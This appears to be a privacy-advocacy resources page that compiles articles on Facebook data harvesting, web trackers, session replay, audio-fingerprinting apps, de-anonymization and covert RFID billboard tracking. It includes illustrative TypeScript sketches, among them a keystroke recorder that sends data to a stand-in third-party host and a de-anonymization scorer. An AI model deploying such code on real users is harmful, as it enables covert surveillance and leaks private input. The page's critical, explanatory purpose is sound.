Resources

Why the Facebook ‘scandal’ impacts you more than you think

It’s not just the data you choose to share.

By now we all know the story: Facebook allowed apps on its social media platform which enabled a shady outfit called Cambridge Analytica to scrape the profiles of 87 million users, in order to serve up targeted ads to benefit the Trump election campaign in 2016.  More than 300,000 Australian users of Facebook were caught up in the data harvesting.

But serving up ads in a foreign election campaign is not the whole story.  Facebook, and other companies involved in data mining, are invading our privacy and harming us economically and socially, in ways that are only just starting to become clear.

And it’s not just the data you choose to share. The information you post is only the tip of the iceberg of data that Facebook has collected about you.

Every time you go online you leave a trail of digital breadcrumbs.  Facebook has been busily sweeping up those breadcrumbs, and using them to categorise and profile you.  Facebook obviously knows when you click on a Facebook ‘like’ button; but also, unless a web developer has gone out of their way to find tools to block them (as we have done for our Salinger Privacy blog), Facebook knows every time you simply look at a website that has a Facebook ‘like’ button somewhere on it.
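To make that concrete, here is a minimal sketch, in TypeScript, of what any embedded third-party widget can do the instant a page loads. The endpoint and field names are hypothetical, not Facebook’s actual code; the point is simply that the visit and the referrer are reported, with the tracker’s own cookie attached, before you click anything.

```typescript
// Hypothetical sketch: the endpoint and field names are illustrative,
// not Facebook's actual API. Any third-party script embedded in a page
// can report the visit the moment the page loads.
function reportPageView(): void {
  const payload = new URLSearchParams({
    page: document.location.href, // the article you are reading
    ref: document.referrer,       // the page you arrived from
  });
  // The browser attaches the tracker's own cookie to this request,
  // tying the visit to a logged-in identity. Note that this fires on
  // page load, before the 'like' button is rendered, let alone clicked.
  navigator.sendBeacon("https://tracker.example/impression", payload);
}

reportPageView();
```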

So if you only post or ‘like’ stories about inspirational mountain climbers and funny cat videos, but also do things online that you don’t share with your family, friends or work colleagues (like looking at stories about abortion or dealing with infidelity, Googling how to manage anxiety or erectile dysfunction, whingeing about your employer in a chatroom, or spending hours reviewing dating profiles, gambling or shopping obsessively for shoes)  — Facebook has you pegged anyway.

Plus, Facebook obtains data from other sources which know about your offline purchases, to build an even richer picture of who you really are.  And of course, Facebook may have access to your address book, your location history, the contents of your private messages, and depending on your brand of phone, possibly even a history of your phone calls and text messages.

All that information is used to draw inferences and assumptions about your preferences, and predict your likely behaviour.  The results are then used to categorise, profile and ultimately target you, in a process usually described as ‘online behavioural advertising’.

It’s not ‘just ads’

The objective of online behavioural advertising is to predict your purchasing interests and drive a purchase decision.  So far, the same as any other advertising.  But online, the implications for us as individuals are much greater.

Facebook’s promise to advertisers is that it can show their ad to exactly who the advertiser wants, and exclude everybody else.

However, by allowing exclusion, the platform also allows discrimination.  Facebook has been caught allowing advertisers to target — and exclude — people on the basis of their ‘ethnic affinity’, amongst other social, demographic, racial and religious characteristics.  So a landlord with an ad for rental housing could prevent people profiled as ‘single mothers’ from ever seeing their ad.  An employer could prevent people identifying as Jewish from seeing a job ad.  A bank could prevent people categorised as African Americans from seeing an ad for a home loan.

Existing patterns of social exclusion, economic inequality and discrimination are further entrenched by micro-targeted advertising, which is hidden from public view and regulatory scrutiny.

Data boy. Mark Zuckerberg testifies in Washington. Image: Getty.

Predictive analytics can narrow or alter your life choices

Once we move beyond straight-up advertising and into predictive analytics, the impact on individual autonomy becomes more acute.  Big Data feeds machine learning, which finds patterns in the data, from which new rules (algorithms) are designed.  Algorithms predict how a person will behave, and suggest how they should be treated.

Algorithms can lead to price discrimination, like surge pricing based on Uber knowing how much phone battery life you have left.  Or market exclusion, like Woolworths only offering car insurance to customers it has decided are low risk, based on an assessment of the groceries they buy.

Banks have been predicting the risk of a borrower defaulting on a loan for decades, but now algorithms are also used to determine who to hire, predict when a customer is pregnant, and deliver targeted search results to influence how you vote.

Algorithms are also being used to predict which students are at risk of failure, which prisoners are at risk of re-offending, and who is at risk of suicide, and then to launch interventions accordingly.  However, even leaving aside the accuracy of those predictions, interventions are not necessarily well-intentioned.  It was revealed last year that Australian Facebook executives were touting to advertisers their ability to target psychologically vulnerable teenagers.

Automated decision-making diminishes our autonomy, by narrowing or altering our market and life choices, in ways that are not clear to us.  People already in a position of economic or social disadvantage face the additional challenge of trying to disprove or beat an invisible algorithm.

In a predictive and pre-emptive world, empathy, forgiveness, rehabilitation, redemption, individual dignity, autonomy and free will are programmed out of our society.

Fiddling with users’ privacy settings on Facebook won’t fix anything.  If we want our lives to be ruled by human values and individual dignity, instead of by machines fed on questionable data, we need robust, enforced and globally effective privacy laws.

A new European privacy law, the General Data Protection Regulation (GDPR), commences later this month.  Among its obligations, businesses and governments must offer understandable explanations of how their algorithms work, and allow people to seek human review of automated decision-making.  This is a step in the right direction, which Australia, the US and the rest of the world should follow.

An Apology for the Internet–from the people who built it

There have always been outsiders who criticized the tech industry — even if their concerns have been drowned out by the oohs and aahs of consumers, investors, and journalists. But today, the most dire warnings are coming from the heart of Silicon Valley itself. The man who oversaw the creation of the original iPhone believes the device he helped build is too addictive. The inventor of the World Wide Web fears his creation is being “weaponized.” Even Sean Parker, Facebook’s first president, has blasted social media as a dangerous form of psychological manipulation. “God only knows what it’s doing to our children’s brains,” he lamented recently.

If the tech industry likes to assume the trappings of a religion, complete with a quasi-messianic story of progress, the Church of Tech is now giving rise to a new sect of apostates, feverishly confessing their own sins. And the internet’s original sin, as these programmers and investors and CEOs make clear, was its business model.

The advertising model of the internet was different from anything that came before. Whatever you might say about broadcast advertising, it drew you into a kind of community, even if it was a community of consumers. The culture of the social-media era, by contrast, doesn’t draw you anywhere. It meets you exactly where you are, with your preferences and prejudices — at least as best as an algorithm can intuit them. “Microtargeting” is nothing more than a fancy term for social atomization — a business logic that promises community while promoting its opposite.

YouTube, YouTubers and You

Google and Facebook are watching our every move online

You may know that hidden trackers lurk on most websites you visit, soaking up your personal information. What you may not realize, though, is 76 percent of websites now contain hidden Google trackers, and 24 percent have hidden Facebook trackers, according to the Princeton Web Transparency & Accountability Project. The next highest is Twitter with 12 percent. It is likely that Google or Facebook are watching you on many sites you visit, in addition to tracking you when using their products. As a result, these two companies have amassed huge data profiles on each person, which can include your interests, purchases, search, browsing and location history, and much more. They then make your sensitive data profile available for invasive targeted advertising that can follow you around the Internet.

So how do we move forward from here? Don’t be fooled by claims of self-regulation: any useful long-term reform of Google and Facebook’s data privacy practices fundamentally opposes their core business models of hyper-targeted advertising based on ever more intrusive personal surveillance. Change must come from the outside. Unfortunately, we’ve seen relatively little from Washington. Congress and federal agencies need to take a fresh look at what can be done to curb these data monopolies.

They first need to demand more algorithmic and privacy-policy transparency, so people can truly understand the extent to which their personal information is being collected, processed and used by these companies. Only then can informed consent be possible. They also need to legislate that people own their own data, enabling real opt-outs. Finally, they need to restrict how data can be combined, including being more aggressive at blocking acquisitions that further consolidate data power, which will pave the way for more competition in digital advertising. Until we see such meaningful changes, consumers should vote with their feet.

That Game on Your Phone May Be Tracking What You’re Watching on TV

At first glance, the gaming apps — with names like “Pool 3D,” “Beer Pong: Trickshot” and “Real Bowling Strike 10 Pin” — seem innocuous. One called “Honey Quest” features Jumbo, an animated bear.

Yet these apps, once downloaded onto a smartphone, have the ability to keep tabs on the viewing habits of their users — some of whom may be children — even when the games aren’t being played.

It is yet another example of how companies, using devices that many people feel they can’t do without, are documenting how audiences in a rapidly changing entertainment landscape are viewing television and commercials.

The apps use software from Alphonso, a start-up that collects TV-viewing data for advertisers. Using a smartphone’s microphone, Alphonso’s software can detail what people watch by identifying audio signals in TV ads and shows, sometimes even matching that information with the places people visit and the movies they see. The information can then be used to target ads more precisely and to try to analyze things like which ads prompted a person to go to a car dealership.
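As a rough illustration of the technique, here is a toy TypeScript sketch of audio-fingerprint matching. Real systems like Alphonso’s are described as using robust spectral fingerprints; the chunk-energy hash below is only a stand-in for the pipeline (fingerprint the microphone audio, then look for overlap with a database of known ad fingerprints), and every name in it is an assumption for illustration.

```typescript
// Toy sketch of audio-fingerprint matching. Real systems use robust
// spectral fingerprints; this chunk-energy hash is only a stand-in
// to show the pipeline, and all names here are hypothetical.
function fingerprint(samples: Float32Array, chunk = 4096): string[] {
  const prints: string[] = [];
  for (let i = 0; i + chunk <= samples.length; i += chunk) {
    let energy = 0;
    for (let j = i; j < i + chunk; j++) energy += Math.abs(samples[j]);
    prints.push(Math.round(energy * 10).toString(36)); // coarse per-chunk signature
  }
  return prints;
}

// Match microphone audio against a database of known ad fingerprints.
function identifyAd(mic: Float32Array, ads: Map<string, string[]>): string | null {
  const heard = new Set(fingerprint(mic));
  for (const [adName, adPrints] of ads) {
    const hits = adPrints.filter((p) => heard.has(p)).length;
    if (adPrints.length > 0 && hits / adPrints.length > 0.6) return adName; // 60% overlap
  }
  return null;
}
```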

More than 250 games that use Alphonso software are available in the Google Play store; some are also available in Apple’s app store.

Some of the tracking is taking place through gaming apps that do not otherwise involve a smartphone’s microphone, including some apps that are geared toward children. The software can also detect sounds even when a phone is in a pocket if the apps are running in the background.

Over 400 of the World’s Most Popular Websites Record Your Every Keystroke

The idea of websites tracking users isn’t new, but research from Princeton University released last week indicates that online tracking is far more invasive than most users understand.

In the first installment of a series titled “No Boundaries,” three researchers from Princeton’s Center for Information Technology Policy (CITP) explain how third-party scripts that run on many of the world’s most popular websites track your every keystroke and then send that information to a third-party server.

Some highly-trafficked sites run software that records every time you click and every word you type. If you go to a website, begin to fill out a form, and then abandon it, every letter you entered is still recorded, according to the researchers’ findings. If you accidentally paste something from your clipboard into a form, that is recorded too. These scripts, or bits of code that websites run, are called “session replay” scripts. Session replay scripts are used by companies to gain insight into how their customers use their sites and to identify confusing webpages. But the scripts don’t just aggregate general statistics; they record, and are capable of playing back, individual browsing sessions.
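To see how little machinery this takes, here is a minimal sketch of a session-replay recorder, assuming a hypothetical collector endpoint; commercial scripts are far more elaborate, but the pattern of capturing input events and batching them to a third-party server is the same.

```typescript
// Minimal sketch of a "session replay" recorder, assuming a hypothetical
// collector endpoint; commercial scripts are far more elaborate, but the
// pattern is the same: capture input events, batch them to a third party.
type ReplayEvent =
  | { kind: "key"; key: string; field: string; t: number }
  | { kind: "click"; x: number; y: number; t: number };

const buffer: ReplayEvent[] = [];

document.addEventListener("keydown", (e) => {
  // Every keystroke is captured, even in forms you never submit.
  buffer.push({
    kind: "key",
    key: e.key,
    field: (e.target as HTMLElement)?.id ?? "",
    t: Date.now(),
  });
});

document.addEventListener("click", (e) => {
  buffer.push({ kind: "click", x: e.clientX, y: e.clientY, t: Date.now() });
});

// Ship everything to the third-party server every five seconds.
setInterval(() => {
  if (buffer.length === 0) return;
  navigator.sendBeacon(
    "https://replay.example/ingest", // hypothetical collector
    JSON.stringify(buffer.splice(0, buffer.length))
  );
}, 5000);
```

Note that nothing here waits for a form to be submitted; the batches go out regardless of whether you ever press “send”.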

The scripts don’t run on every page, but are often placed on pages where users input sensitive information, like passwords and medical conditions. Most troubling is that the information session replay scripts collect can’t “reasonably be expected to be kept anonymous,” according to the researchers.

The Seemingly Pervasive Sinister Side of Algorithmic Screen Time for Children

Writer and artist James Bridle writes in Medium:

“Someone or something or some combination of people and things is using YouTube to systematically frighten, traumatize, and abuse children, automatically and at scale, and it forces me to question my own beliefs about the internet, at every level.

To begin: Kid’s YouTube is definitely and markedly weird. I’ve been aware of its weirdness for some time. Last year, there were a number of articles posted about the Surprise Egg craze. Surprise Eggs videos depict, often at excruciating length, the process of unwrapping Kinder and other egg toys. That’s it, but kids are captivated by them. There are thousands and thousands of these videos and thousands and thousands, if not millions, of children watching them. […] What I find somewhat disturbing about the proliferation of even (relatively) normal kids videos is the impossibility of determining the degree of automation which is at work here; how to parse out the gap between human and machine.”

Sapna Maheshwari also explores in The New York Times:

“Parents and children have flocked to Google-owned YouTube Kids since it was introduced in early 2015. The app’s more than 11 million weekly viewers are drawn in by its seemingly infinite supply of clips, including those from popular shows by Disney and Nickelodeon, and the knowledge that the app is supposed to contain only child-friendly content that has been automatically filtered from the main YouTube site. But the app contains dark corners, too, as videos that are disturbing for children slip past its filters, either by mistake or because bad actors have found ways to fool the YouTube Kids algorithms. In recent months, parents like Ms. Burns have complained that their children have been shown videos with well-known characters in violent or lewd situations and other clips with disturbing imagery, sometimes set to nursery rhymes.”

Very horrible and creepy.

How Silicon Valley divided society and made everyone raging mad

“Silicon Valley’s utopians genuinely but mistakenly believe that more information and connection makes us more analytical and informed. But when faced with quinzigabytes of data, the human tendency is to simplify things. Information overload forces us to rely on simple algorithms to make sense of the overwhelming noise. This is why, just like the advertising industry that increasingly drives it, the internet is fundamentally an emotional medium that plays to our base instinct to reduce problems and take sides, whether like or don’t like, my guy/not my guy, or simply good versus evil. It is no longer enough to disagree with someone, they must also be evil or stupid…

Nothing holds a tribe together like a dangerous enemy. That is the essence of identity politics gone bad: a universe of unbridgeable opinion between opposing tribes, whose differences are always highlighted, exaggerated, retweeted and shared. In the end, this leads us to ever more distinct and fragmented identities, all of us armed with solid data, righteous anger, a gutful of anger and a digital network of likeminded people. This is not total connectivity; it is total division.”

“Are you happy now? The uncertain future of emotion analytics”

Elise Thomas writes at Hopes & Fears:

“Right now, in a handful of computing labs scattered across the world, new software is being developed which has the potential to completely change our relationship with technology. Affective computing is about creating technology which recognizes and responds to your emotions. Using webcams, microphones or biometric sensors, the software uses a person’s physical reactions to analyze their emotional state, generating data which can then be used to monitor, mimic or manipulate that person’s emotions.”

Corporations spend billions each year trying to build “authentic” emotional connections to their target audiences. Marketing research is one of the most prolific research fields around, conducting thousands of studies on how to more effectively manipulate consumers’ decision-making. Advertisers are extremely interested in affective computing and particularly in a branch known as emotion analytics, which offers unprecedented real-time access to consumers’ emotional reactions and the ability to program alternative responses depending on how the content is being received.

For example, if two people watch an advertisement with a joke and only one person laughs, the software can be programmed to show more of the same kind of advertising to the person who laughs, while trying different sorts of advertising on the person who did not laugh to see if it’s more effective. In essence, affective computing could enable advertisers to create individually-tailored advertising en masse.
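A toy sketch of that feedback loop might look like the following, where the amusement score is assumed to come from some affective-computing SDK (webcam-based smile detection, say); all names are hypothetical.

```typescript
// Toy sketch of the feedback loop described above. The amusement score
// is assumed to come from some affective-computing SDK (webcam-based
// smile detection, say); all names here are hypothetical.
interface AdCreative {
  id: string;
  style: "humorous" | "serious" | "emotional";
}

const inventory: AdCreative[] = [
  { id: "ad-1", style: "humorous" },
  { id: "ad-2", style: "serious" },
  { id: "ad-3", style: "emotional" },
];

function nextAd(lastShown: AdCreative, amusement: number): AdCreative {
  if (amusement > 0.7) {
    // The viewer laughed: keep serving the style that worked.
    return inventory.find((a) => a.style === lastShown.style) ?? lastShown;
  }
  // No reaction: rotate to a different style and measure again.
  return inventory.find((a) => a.style !== lastShown.style) ?? lastShown;
}
```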

“Say 15 years from now a particular brand of weight loss supplements obtains a particular girl’s information and locks on. When she scrolls through her Facebook, she sees pictures of rail-thin celebrities, carefully calibrated to capture her attention. When she turns on the TV, it automatically starts on an episode of “The Biggest Loser,” tracking her facial expressions to find the optimal moment for a supplement commercial. When she sets her music on shuffle, it “randomly” plays through a selection of the songs which make her sad. This goes on for weeks.

Now let’s add another layer. This girl is 14, and struggling with depression. She’s being bullied in school. Having become the target of a deliberate and persistent campaign by her technology to undermine her body image and sense of self-worth, she’s at risk of making some drastic choices.”

What Makes You Click (2016)

“The biggest psychological experiment ever is being conducted, and we’re all taking part in it: every day, a billion people are tested online. Which ingenious tricks and other digital laws ensure that we fill our online shopping carts to the brim, or stay on websites as long as possible? Or vote for a particular candidate?

The bankruptcies of department stores and shoe shops clearly show that our buying behaviour is rapidly shifting to the Internet. An entirely new field has arisen, of ‘user experience’ architects and ‘online persuasion officers’. How do these digital data dealers use, manipulate and abuse our user experience? Not just when it comes to buying things, but also with regards to our free time and political preferences.

Aren’t companies, which are running millions of tests at a time, miles ahead of science and government, in this respect? Now the creators of these digital seduction techniques, former Google employees among them, are themselves arguing for the introduction of an ethical code. What does it mean, when the conductors of experiments themselves are asking for their power and possibilities to be restricted?”

“Your browsing history alone can give away your identity”

“Researchers at Stanford and Princeton universities have found a way to connect the dots between people’s private online activity and their Twitter accounts—even for people who have never tweeted.

When the team tested the technique on 400 real people who submitted their browsing history, they were able to correctly pick out the volunteers’ Twitter profiles nearly three-quarters of the time.

Here’s how the de-anonymization system works: The researchers figured that a person is more likely to click a link that was shared on social media by a friend—or a friend of a friend—than any other random link on the internet. (Their model controls for the baseline popularity of each website.) With that in mind, and the details of an anonymous person’s browser history in hand, the researchers can compute the probability that any one Twitter user created that browsing history. People’s basic tendency to follow links they come across on Twitter unmasks them—and it usually takes less than a minute.

“You can even be de-anonymized if you just browse and follow people, without actually sharing anything.”
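The published model is more sophisticated, but the core idea can be sketched as a likelihood-ratio score: a link that appeared in a candidate’s Twitter feed is assumed to be some factor more likely to be visited by that candidate than by a random user, while controlling for each link’s baseline popularity. The boost factor and the inputs below are assumptions for illustration.

```typescript
// Sketch of the core scoring idea, as a log-likelihood ratio: a link that
// appeared in a candidate's Twitter feed is assumed to be some factor more
// likely to be visited by that candidate than by a random user. The factor
// of 50 and all inputs are assumptions for illustration; the published
// model is more sophisticated.
function scoreCandidate(
  history: string[],                   // URLs from the anonymous browsing history
  feedLinks: Set<string>,              // URLs shared in this candidate's network
  basePopularity: Map<string, number>, // P(random user visits this URL)
): number {
  let score = 0;
  for (const url of history) {
    const base = basePopularity.get(url) ?? 1e-6;
    // Links from the candidate's own feed get boosted probability;
    // everything else stays at its baseline (contributing log 1 = 0).
    const pGivenCandidate = feedLinks.has(url) ? Math.min(1, base * 50) : base;
    score += Math.log(pGivenCandidate / base);
  }
  return score; // the highest-scoring candidate is the best-guess identity
}
```

Scored across the candidate accounts, the top result matched the volunteer’s real profile nearly three-quarters of the time in the study.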

“Creepy new website makes its monitoring of your online behaviour visible”

“If YOU think you are not being analysed while browsing websites, it could be time to reconsider. A creepy new website called clickclickclick has been developed to demonstrate how our online behaviour is continuously measured.

The site, which observes and comments on your behaviour in detail, and is not harmful to your computer, contains nothing but a white screen and a large green button. From the minute you visit the website, it begins detailing your actions on the screen in real-time.

The site also encourages users to turn on their audio, which offers the even more disturbing experience of having an English voice comment about your behaviour.

Designer Roel Wouters said the experiment was aimed to remind people about the serious themes of big data and privacy. “It seemed fun to thematise this in a simple and lighthearted way,” he said.

Fellow designer Luna Maurer said her own experiences with the internet had helped shape the project. “I am actually quite internet aware, but I am still very often surprised that after I watched something on a website, a second later I get instantly personalised ads,” she said.”

Data surveillance is all around us, and it’s going to change our behaviour

“Increasing aspects of our lives are now recorded as digital data that are systematically stored, aggregated, analysed, and sold. Despite the promise of big data to improve our lives, all encompassing data surveillance constitutes a new form of power that poses a risk not only to our privacy, but to our free will.

A more worrying trend is the use of big data to manipulate human behaviour at scale by incentivising “appropriate” activities, and penalising “inappropriate” activities. In recent years, governments in the UK, US, and Australia have been experimenting with attempts to “correct” the behaviour of their citizens through “nudge units”.”

Nudge units: “In ways you don’t detect [corporations and governments are] subtly influencing your decisions, pushing you towards what it believes are your (or its) best interests, exploiting the biases and tics of the human brain uncovered by research into behavioural psychology. And it is trying this in many different ways on many different people, running constant trials of different unconscious pokes and prods, to work out which is the most effective, which improves the most lives, or saves the most money. Preferably, both.”

“In his new book Inside the Nudge Unit, published this week in Britain, Halpern explains his fascination with behavioural psychology.

“Our brains weren’t made for the day-to-day financial judgments that are the foundation of modern economies: from mortgages, to pensions, to the best buy in a supermarket. Our thinking and decisions are fused with emotion.”

There’s a window of opportunity for governments, Halpern believes: to exploit the gaps between perception, reason, emotion and reality, and push us the “right” way.

He gives me a recent example of BI’s work – they were looking at police recruitment, and how to get a wider ethnic mix.

Just before applicants did an online recruitment test, in an email sending the link, BI added a line saying “before you do this, take a moment to think about why joining the police is important to you and your community”.

There was no effect on white applicants. But the pass rate for black and minority ethnic applicants moved from 40 to 60 per cent.

“It entirely closes the gap,” Halpern says. “Absolutely amazing. We thought we had good grounds in the [scientific research] literature that such a prompt might make a difference, but the scale of the difference was extraordinary.”

Halpern taught social psychology at Cambridge but spent six years in the Blair government’s strategy unit. An early think piece on behavioural policy-making was leaked to the media and caused a small storm – Blair publicly disowned it and that was that. Halpern returned to academia, but was lured back after similar ideas started propagating through the Obama administration, and Cameron was persuaded to give it a go.

Ministers tend not to like it – once, one snapped, “I didn’t spend a decade in opposition to come into government to run a pilot”, but the technique is rife in the digital commercial world, where companies like Amazon or Google try 20 different versions of a web page.

Governments and public services should do it too, Halpern says. His favourite example is Britain’s organ donor register. They tested eight alternative online messages prompting people to join, including a simple request, different pictures, statistics or conscience-tweaking statements like “if you needed an organ transplant would you have one? If so please help others”.

It’s not obvious which messages work best, even to an expert. The only way to find out is to test them. They were surprised to find that the picture (of a group of people) actually put people off, Halpern says.

In future they want to use demographic data to personalise nudges, Halpern says. On tax reminder notices, they had great success putting the phrase “most people pay their tax on time” at the top. But a stubborn top 5 per cent, with the biggest tax debts, saw this reminder and thought, “Well, I’m not most people”.

This whole approach raises ethical issues. Often you can’t tell people they’re being experimented on – it’s impractical, or ruins the experiment, or both.

“If we’re trying to find the best way of saying ‘don’t drop your litter’ with a sign saying ‘most people don’t drop litter’, are you supposed to have a sign before it saying ‘caution you are about to participate in a trial’?

“Where should we draw the line between effective communication and unacceptable ‘PsyOps’ or propaganda?”

“Yahoo has a creepy plan for advertising billboards to spy on you”

Yahoo has filed a patent for a type of smart billboard that would collect people’s information and use it to deliver targeted ad content in real-time.

To achieve that functionality, the billboards would use a variety of sensor systems, including cameras and proximity technology, to capture real-time audio, video and even biometric information about potential target audiences.

But the tech company doesn’t just want to know about a passing vehicle. It also wants to know who the occupants are inside of it.

That’s why Yahoo is prepared to cooperate with cell towers and telecommunications companies to learn as much as possible about each vehicle’s occupants.

“Various types of data (e.g., cell tower data, mobile app location data, image data, etc.) can be used to identify specific individuals in an audience in position to view advertising content. Similarly, vehicle navigation/tracking data from vehicles equipped with such systems could be used to identify specific vehicles and/or vehicle owners. Demographic data (e.g., as obtained from a marketing or user database) for the audience can thus be determined for the purpose of, for example, determining whether and/or the degree to which the demographic profile of the audience corresponds to a target demographic.”

Is Facebook eavesdropping on your phone conversations?

Facebook is monitoring your reactions to serve you ads, warn Belgian Police

Belgian police have asked citizens to shun Facebook’s “Reactions” buttons to protect their privacy. In February, five new “Reaction” buttons were added next to the “Like” button to allow people to display responses such as sad, wow, angry, love and haha. According to reports, police said Facebook is able to use the tool to tell when people are likely to be in a good mood — and then decide when is the best time to show them ads. “The icons help not only express your feelings, they also help Facebook assess the effectiveness of the ads on your profile,” a post on Belgian’s official police website read.

“By limiting the number of icons to six, Facebook is counting on you to express your thoughts more easily, so that the algorithms that run in the background are more effective,” the post continues. “With a few mouse clicks you let it know what makes you happy. That helps Facebook find the perfect spot on your profile to display content that will arouse your curiosity, and to choose the moment to present it. If it appears that you are in a good mood, it can deduce that you are more receptive, and it can tell advertisers they will have a better chance of getting you to react.”

Marketers hungry for data from wearable devices

“In the future the data procured from smartwatches might be much more valuable than what is currently available from laptop and mobile users,” reports David Curry, raising the possibility that stores might someday use your past Google searches to alert you when they’re selling a cheaper product.

Why movie trailers now begin with five-second ads for themselves

Emphasis added.

“Jason Bourne takes off his jacket, punches a man unconscious, looks forlornly off camera, and then a title card appears. The ad — five seconds of action — is a teaser for the full Jason Bourne trailer (video), which immediately follows the teaser. In fact, the micro-teaser and trailer are actually part of the same video, the former being an intro for the latter. The trend is the latest example of metahype, a marketing technique in which brands promote their advertisements as if they’re cultural events unto themselves.

[…]

“Last year, the studio advertised the teaser for Ant-Man with a ten-second cut of the footage reduced to an imperceptible scale. […] But where previous metahype promoted key dates in a marketing campaign—like official trailer releases and fan celebrations—the burgeoning trend of teasers within trailers exists purely to retain the viewer’s attention in that exact moment. The teaser within the trailer speaks to a moment in which we have so many distractions and choices that marketers must sell us on giving a trailer three minutes of our time. This practice isn’t limited to movie trailers, though. Next time you’re on Facebook, pay attention to how the popular videos in your newsfeed are edited. Is the most interesting image the first thing you see? And does that trick get you to stop scrolling and watch?”

“Dog Grabs Shoppers’ Attention Via Interactive Billboards”

An example of advertising meeting personalisation, in the service of good old-fashioned manipulative marketing. Please excuse the barrage of branding/product mentions throughout the copy and media materials.

Also note how covert the deployment of the technology is: great lengths are taken to embed hidden tracking systems in the physical environment. The people subjected to the advertising are never told that they are carrying a tracking device, or that the content displayed to them is tailored for emotional manipulation far beyond ordinary advertising. Afterwards, some asked whether the experience had been a “coincidence”.

Emphasis added:

For two weeks this past spring, some shoppers at the Westfield Stratford shopping mall in the United Kingdom were followed by a homeless dog appearing on electronic billboards. The roving canine, named Barley, was part of an RFID-based advertisement campaign conducted by Ogilvy on behalf of the Battersea Dogs and Cats Home, a rehabilitation and adoption organization for stray animals. The enabling technology was provided by Intellifi, and was installed by U.K.-based RFID consultancy RFIDiom.

Ogilvy’s ad campaign was the brainchild of William Godfrey, an “experience designer” at the advertising agency. Ogilvy is a fan of Battersea—and of pets in general—Godfrey explains, and he thought about how technology could be used to bring the plight of homeless animals directly to the public in a memorable way. “I had the idea that it would be lovely to digitalize dogs,” he says, and radio frequency identification seemed the best technology to make it appear that a digitalized canine was following people in the way that an actual stray dog might do. Ogilvy had considered the use of other technologies, such as cameras, but ultimately decided that RFID would make the process seamless and automatic.

[…]

Eric Jones, RFIDiom’s managing director, says he, too, is an animal lover. When Ogilvy suggested a campaign using RFID to put images of pets in front of shoppers on an individualized basis, Jones was up to the task, despite the short (two-week) deadline. It was a bit different than the company’s typical RFID deployments (which include document-tracking, supply chain management and industrial traceability solutions), and he says he and his engineers enjoy a good challenge.
 

The RFID system worked this way: representatives of the Battersea Dogs and Cats Home, including Fishersmith herself, greeted shoppers at the entrance, offering them an RFID-tagged Battersea brochure if they seemed especially interested in pets. To better judge this, one individual stood at the entrance holding a dog or cat from the shelter. Every shopper who walked up to the animal for a closer look, or to pet it, received a brochure. Attached to that brochure was a Smartrac Frog 3D RFID inlay encoded with a unique ID number that the system would recognize. That ID was not connected to any data about the individual carrying the brochure, since the company’s intention was that shoppers would remain anonymous.

Consumers were not told that the brochure had any special technology built into it. Therefore, an individual could be surprised when the advertising video changed to a dog—Barley—when he or she approached the billboard.

An Intellifi Smartspot RFID reader.

A total of seven digital billboards, located in or near the mall, were RFID-enabled, according to Matthijs van der Weg, Intellifi’s CEO.

An Intellifi reader (known as a Smartspot), with as many as six antennas built into it, was installed at each of the seven billboard sites, and some of the readers were also fitted with an additional external Intellifi reader antenna. The reader detected the zone in which an individual was located. Each antenna supported two to three zones, with a single zone’s radius equal to a distance of three steps that a shopper might move while walking. The reader forwarded the brochures’ unique IDs and signal information to Intellifi’s Brain software on the server, which then calculated each shopper’s location relative to that particular billboard.

The location data was provided to Ogilvy’s content-management software, which displayed an image of a dog whose movements corresponded to that shopper’s location. If the person holding the RFID-tagged brochure was walking to the left, the dog followed in that direction. As he or she approached the screen, the animal on the video seemed to approach as well.

The system also tracked which screens a shopper had already passed. This allowed the billboards to play only video images that he or she had not already seen.
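Pieced together from that description, the billboard logic might look roughly like this; the zone-to-steps mapping and every function name below are assumptions, not Intellifi’s or Ogilvy’s actual software.

```typescript
// Rough sketch of the billboard logic pieced together from the description
// above. The zone-to-steps mapping and every function name are assumptions,
// not Intellifi's or Ogilvy's actual software.
interface TagRead {
  tagId: string; // unique ID from the brochure's RFID inlay
  zone: number;  // zone computed by the reader; nearest zone = 0
}

// Which screens each brochure has already triggered, so every billboard
// plays only footage the shopper has not yet seen.
const seenScreens = new Map<string, Set<number>>();

function onTagRead(read: TagRead, screenId: number): void {
  const seen = seenScreens.get(read.tagId) ?? new Set<number>();
  if (seen.has(screenId)) return; // shopper already saw this screen

  // Each zone is roughly three paces deep, per the article.
  const distanceSteps = read.zone * 3;
  playDogVideo(screenId, distanceSteps); // hypothetical display call
  seen.add(screenId);
  seenScreens.set(read.tagId, seen);
}

function playDogVideo(screenId: number, distanceSteps: number): void {
  console.log(`screen ${screenId}: Barley approaches from ~${distanceSteps} steps away`);
}
```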

Some reader installations were easier than others, Jones says. At some billboards, for instance, there was a power source to which the reader could be connected, while in other cases RFIDiom installed standalone power units to energize the readers. It was important that the hardware not be apparent, he adds, and RFIDiom made a few creative adjustments to ensure that the readers, antennas and power units were obscured.

In some cases, the readers were painted green and hung in trees or placed in bushes near the screen, while others were attached to lampposts. One RFID-enabled billboard was located on a nearby footbridge that some shoppers traversed to reach the mall. In this case, RFIDiom installed flowerbeds with false bottoms and buried the readers in with the flowers.

 
During the two weeks in April, the system tracked hundreds of shoppers. “People did a bit of a double-take,” Fishersmith says. “At first, they weren’t sure if it was just a coincidence that the dog seemed to be following them.” In some cases, they approached the Battersea representatives in front of the mall to ask if their experience had just been a coincidence, and many wanted to repeat the process.

Altogether, Godfrey says, shoppers carried about 700 brochures throughout the mall. The campaign’s successful result, he adds, “has put RFID on the radar” for other Ogilvy engineers. “I don’t think it will be the last time” Ogilvy will use such technology, he predicts, noting that the specific campaign will need to be one that benefits from the sense of having content follow an individual (in the same way Barley did).

“The main thing is that we proved it could be done,” Jones says, speaking on behalf of Intellifi and RFIDiom.

Here is some footage of people “interacting” with the system as part of the marketing campaign. The footage is basically an ad; it’s from the campaign’s website:
 

What Stores See When They Spy on Shoppers
